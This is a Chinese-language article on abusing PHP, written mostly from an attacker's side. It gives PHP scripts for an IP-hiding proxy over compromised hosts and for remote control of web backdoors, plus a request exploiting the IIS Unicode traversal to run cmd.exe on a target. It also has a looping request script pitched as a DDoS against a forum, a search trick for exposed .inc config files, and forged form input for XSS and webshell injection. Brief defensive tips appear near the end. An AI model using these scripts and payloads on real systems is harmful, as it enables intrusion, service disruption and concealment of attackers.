1．遠程文件
PHP是一門具有豐富特性的語言，它提供了大量函數，使程序員能夠方便地實現各種功能，遠程文件就是一個很好的例子：
代碼  
<?php
$fp=@Fopen($url,"r") or die ("cannot open $url");
while($line=@fgets($fp,1024)) {
$contents.=$line;
}
echo $contents; //顯示文件內容
fclose($fp); //關閉文件
?>
以上是一段利用Fopen函數打開文件的代碼，由于Fopen函數支持遠程文件，使得它應用起來相當有趣，將以上代碼保存為Proxy.php，然后后提交：
代碼  
/proxy.php?url=http://www.hacker.com.cn/bbs
這時候你會發現論壇下方顯示的IP地址變成了PHP腳本所處服務器的IP地址。Fopen函數可以從任何其Web或FTP站點讀取文件，事實上PHP的大多數文件處理函數對遠程文件都是透明的，比如請求：
代碼  
/proxy.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir
這樣實際上是利用了Target主機上的Unicode漏洞，執行了DIR命令。但并不是所有的服務器都支持遠程文件的功能，如果你使用的是商業的服務器，很可能會發現遠程文件使用不了（如51的虛擬主機），這是因為在商業主機上限制遠程文件的功能，往往能夠更好的保護服務器的正常運行。你可以通過PHPinfo()查看服務器是否支持這種功能。當然，在PHPinfo()被禁用的情況下，也可以使用Get_cfg_var()：
代碼  
<?php
echo "是否允許使用遠程文件（allow_url_Fopen）";
?php
if (get_cfg_var("allow_url_Fopen")=="1")
{
echo("<font color=green><b>是</b></font>");
}
else echo("<font color=red><b>否</b></font>");
?>
當Allow_url_Fopen一項參數為ON時，即支持遠程文件的功能。充分發揮遠程文件的特性，我們可以實現許多特殊的功能：如果你是用過PHP Flame的最新版本，你會發現它在集文件夾復制、文本搜索等功能的基礎上，又增加了Web間文件傳輸的功能，依靠這種功能，你可以隨意將其他服務器上的文件傳送到你的Web目錄下。而且，在兩臺服務器間傳送文件有著飛快的傳輸速度。我們看看實現這個功能的代碼：
代碼  
<?php
$fp = Fopen($_GET['filename'], 'rb'); //打開文件
$data = $tmp = '';
while ( true ) {
$tmp = fgets($fp, 1024);
if ( 0 === strlen($tmp) ) {
break; //跳出while循環
}
$data .= $tmp;
}
fclose($fp); //關閉文件
$file=preg_replace("/^.+\//","",$filename);//轉換文件名
//write
$fp = Fopen("$file", 'wb'); //生成文件
fwrite($fp, $data); //寫入數據
fclose($fp);
?>  
在調用Fopen和Fwrite函數時加入"b"標記，可以使這兩個函數安全運用于二進制文件而不損壞數據。在以上腳本提交：
/down.php?filename=http://www.chinaz.com/winrar.zip
這時便會在Down.php的所處目錄下生成相應的Winrar.zip文件。如果再配合遍歷目錄的功能，你將可以實現多個文件夾服務器間的傳輸。但是，遠程文件應該還有更大的發揮空間，比如寫SQL Injection攻擊的自動腳本，甚至是HTTP的代理服務：
代碼  
<?
$url = getenv("QUERY_STRING");
if(!ereg("^http",$url)) //檢查輸入的URL格式
{
echo "例子：<br>http://www.163.com/<br>";
echo "http://www.xxxx.com/list.php?id=600<br>";
echo "當URL為目錄時需要在目錄后加入"/"";
exit;
}
if($url)
$url=str_replace("\\","/",$url);
$f=@Fopen($url,"r");  //打開文件
$a="";
if($f)
{
while(!feof($f))
$a.=@fread($f,8000);  //讀取文件
fclose($f);
}
$rooturl = preg_replace("/(.+\/)(.*)/i","\\1",$url);  //轉換根目錄
$a = preg_replace("/(src[[:space:]]*=['\"])([^h].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(src[[:space:]]*=)([^h'\"].*?)/is","\\1$rooturl\\2",$a);  //轉換圖片地址
$a = preg_replace("/(action[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=)([^h'\"].*?)/is","\\1$php_self?$rooturl\\2",$a);  //轉換POST地址
$a = preg_replace("/(<a.+?href[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=[^'\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);//轉換鏈接地址
$a = preg_replace("/(link.+?href[[:space:]]*=[^'\"])(.*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=['\"])(.*?)/is","\\1$rooturl\\2",$a); //轉換樣式表地址
echo $a;
exit;
?>
在正則表達式的幫助下，以上代碼能夠自行地將返回頁面中包含的鏈接和圖片進行轉換，并把頁面內的鏈接自動提交到當前PHP腳本的$url中。例如提交：
/proxy.php?http://www.xfocus.net/
腳本將會返回http://www.xfocus.net/的內容，如圖1所示。
圖1
當然，這運用的絕對不僅僅是框架的技巧。運用這個腳本你可以遠程操作安置在其他服務器的Web后門，或者將肉雞做成一個簡單的HTTP代理，從而更好的隱藏自己的IP。如果使用PHP編寫CGI掃描工具，你需要延長PHP的有效運行時間。以下是兩種有效的方法，當然你也可以將PHP代碼編譯成GUI界面，從而解決這個問題。設置PHP的有效運行時間為三分鐘：
代碼  
<? ini_set("max_execution_time",60*3); ?>
<? set_time_limit(60*3); ?>
我們再看看這種功能在DDOS攻擊中的應用：
代碼  
<?php
set_time_limit(60*3);
$url="http://www.xxx.com/bbs/userlist.php?userid=";
for($i=1131;$i<=1180;$i++)
{
$urls=$url.$i; //將$url與$i鏈接在一起
$f=@Fopen($urls,"r"); //請求$urls
$a=@fread($f,10);  //取出部分內容
fclose($f); //關閉$urls
}
?>  
以上用For循環不斷地請求Userlist.php?userid＝$i的內容（$i的值每次都是不同的），但是打開后僅僅取出幾個字節便關閉這個腳本了。PHP運行在虛擬主機上，10秒鐘便可以打開幾十個URL，當同時運行多個進程時，便有可能實現DDOS攻擊，讓對方的論壇迅速崩潰。
限于版面，遠程文件的內容就先說到這里了，如果你還有不明白的地方，請參考以下的這篇文章：《在PHP中使用遠程文件》
2．錯誤回顯
PHP在默認的情況下打開錯誤回顯，這樣可以便于程序員在調試腳本時發現代碼的錯誤，但是這也往往使Web暴露了PHP的代碼和服務器的一些數據。PHP對代碼的規范性要求比較嚴格，以下是一種比較常見的錯誤回顯：
warning:file("data/1120\'.htm)-no such file or
directory in /usr/home/xxxxx.com/show.php on line 300
這種錯誤回顯，至少告訴了我們三個信息：服務器的操作系統是LINUX；服務器使用文本數據庫；Show.php的第300行代碼為"file ("./data/1120/".$data.".htm")"。
這種錯誤回顯，已經足以成為一臺服務器致命的漏洞。從另一個利用的角度來看，我們發現一般的PHP錯誤回都包含了"warning"字符，但是這有什么用呢？我們得先認識一下PHP的庫文件。
PHP的Include()和Require()主要是為了支持代碼庫，因為我們一般是把一些經常使用的函數放到一個獨立的文件中，這個獨立的文件就是代碼庫，當需要使用其中的函數時，我們只要把這個代碼庫包含到當前的文件中就可以了。
最初，人們開發和發布PHP程序的時候，為了區別代碼庫和主程序代碼，一般是為代碼庫文件設置一個".inc"的擴展名，但是他們很快發現這是一個錯誤，因為這樣的文件無法被PHP解釋器正確解析為PHP代碼。如果我們直接請求服務器上的這種文件時，我們就會得到該文件的源代碼，這是因為當把PHP作為Apache的模塊使用時，PHP解釋器是根據文件的擴展名來決定是否解析為PHP代碼的。擴展名是站點管理員指定的，一般是".php"， ".php3"和".php4"。如果重要的配置數據被包含在沒有合適的擴展名的PHP文件中，那么遠程攻擊者將容易得到這些信息。
按照以往的程序員的習慣，往往會把一些重要的文件設定"config.inc","coon.inc"等形式，如果我們在搜索引撃中搜索"warning+config.inc"，那么你會發現許多網站都暴露了".inc"文件的代碼，甚至包括許多商業和政府網站，如圖2所示。
圖2
要關閉PHP的錯誤回顯通常有兩個方法，第一個是直接修改Php.ini中的設置，這我們以前已經介紹過了；第二種方法是在PHP腳本中加入抑制錯誤回顯的代碼，你可以在調用的函數前函數加入"@"字符，或者在PHP的代碼頂端加入"error_reporting(0)；"的代碼，要了解更多的內容請參考PHP手冊中的"error_reporting"一節。
3．變量回顯
WEN的安全問題主要集中變量的處理上，對變量的處理不當，會導致多種安全問題。先看一下的例子：
代碼  
<td width="400">
<select name="face">
<option value="1.gif">1.gif</option>
<option value="2.gif">2.gif</option>
......
$face的值按照程序員的意圖應僅設定在下拉菜單中供用戶選擇，但是事實上我們可以通過POST的方法直接指定$face的值騙過程序：
&data=……" target="_blank">http://target/bbs/edit.php?action=reface&u...t>&data=......
程序接到$face的值后未經過任何處理，便將它顯示出來了：
<img scr ="<? echo $face; ?>" >
從而導致了跨站腳本攻擊等安全問題，用這種方法，你甚至可以向PHP文本數據庫中寫入WebShell。作為程序員，你可以使用正則表達式檢查用戶的輸入內容。如：
代碼  
<?php
if (ereg (">",$face)) {
echo "頭像有誤";
exit;}
?>
這僅是一種簡單的檢查方法，不要依賴于PHP自動為特殊字符增加"\"的功能，這樣往往會讓你得到意想不到的惡果。
PHP就一門CGI語言而言，它的功能已不僅僅局限于編寫網站，它的一些安全問題也不可避免的存在，如：PHP的Safe Mode并不能真正限制EXE文件的運行；PHP也可以編寫GUI界面的程序；由于"include"等函數的存在使得PHP后門根本不可能被查殺；PHP同樣能夠使用多線程處理命令。以不同的角度看PHP，你才能更充分發揮它功能。